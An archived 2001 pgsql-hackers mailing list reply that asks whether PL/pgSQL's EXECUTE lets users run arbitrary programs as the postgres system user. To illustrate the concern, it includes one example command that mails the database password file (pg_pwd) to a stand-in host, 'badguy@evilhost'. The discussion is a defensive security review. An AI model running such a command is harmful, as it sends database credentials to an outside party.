Home > mailing lists

Re: Security hole in PL/pgSQL - Mailing list pgsql-hackers

From	KuroiNeko
Subject	Re: Security hole in PL/pgSQL
Date	January 29, 2001 15:18:08
Msg-id	3A75A072.nail2N52XPYU6@ed.ed Whole thread Raw
In response to	Security hole in PL/pgSQL (Jan Wieck <janwieck@Yahoo.com>)
Responses	Re: Security hole in PL/pgSQL ("Dominic J. Eidson" <sauron@the-infinite.org>) Re: Security hole in PL/pgSQL (Jan Wieck <janwieck@Yahoo.com>)
List	pgsql-hackers

Tree view

> Huh? This would only be true if all operations inside plpgsql are
> executed as superuser, which they are not. Seems to me the existing
> defense against non-superuser using COPY is sufficient.
Sorry if I missed the point, but  if I got it right, Pl/Pgsql EXECUTE will
allow execution of any program via exec*() call? If so, this will allow any
(system) user to  execute arbitrary code as postgres  (system) user, right?
If so, how can something like

EXECUTE '/bin/mail badguy@evilhost < /usr/pgsql/data/pg_pwd';
be avioded?


--
������������������

pgsql-hackers by date:

From: Tatsuo Ishii
Date: 29 January 2001, 15:18:06
Subject: Re: Open 7.1 items

From: Tatsuo Ishii
Date: 29 January 2001, 15:25:36
Subject: Re: Open 7.1 items

Re: Security hole in PL/pgSQL - Mailing list pgsql-hackers

Previous

Next